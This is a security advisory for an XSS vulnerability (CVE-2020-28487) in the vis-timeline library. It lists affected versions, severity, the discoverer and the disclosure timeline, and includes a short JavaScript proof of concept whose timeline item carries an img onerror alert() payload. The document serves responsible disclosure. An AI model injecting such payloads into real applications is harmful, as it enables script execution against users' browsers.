Security Advisory
Cross Site Scripting (XSS) vulnerability in vis-timeline
Adversaries that control the content of an timeline event can inject additonal script code.
CVE: CVE-2020-28487
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Severity: low
Affected versions: ≤ 7.4.3
Fixed versions: ≥ 7.4.4
Discovered by: Hans-Martin Münch
Product description
Create a fully customizable, interactive timelines and 2d-graphs with items and ranges.
The Timeline/Graph2D is an interactive visualization chart to visualize data in time. The data items can take place on a single date, or have a start and end date (a range). You can freely move and zoom in the timeline by dragging and scrolling in the Timeline. Items can be created, edited, and deleted in the timeline. The time scale on the axis is adjusted automatically, and supports scales ranging from milliseconds to years.
Details
Aversaries with the ability to control the items of a Timeline element can inject additional script code into the generated application.
Example code:
1// DOM element where the Timeline will be attached
2var container = document.getElementById("visualization");
3
4// Create a DataSet (allows two way data-binding)
5var items = new vis.DataSet([
6 { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
7 { id: 2, content: "item 2", start: "2014-04-14" },
8 { id: 3, content: "item 3", start: "2014-04-18" },
9 { id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
10 { id: 5, content: "item 5", start: "2014-04-25" },
11 { id: 6, content: "item 6", start: "2014-04-27", type: "point" },
12]);
13
14// Configuration for the Timeline
15var options = {};
16var timeline = new vis.Timeline(container, items, options);
Coordinated Disclosure Timeline
- 10/12/2020 Issue reported to Synk, which handled the vulnerability disclosure and assigned a CVEs.
- 18/12/2020 Creation of GitHub issue.
- 20/12/2020 GitHub pull request with mitigation.
- 25/12/2020 Public disclosure.
- 22/01/2021 Published on Snyk.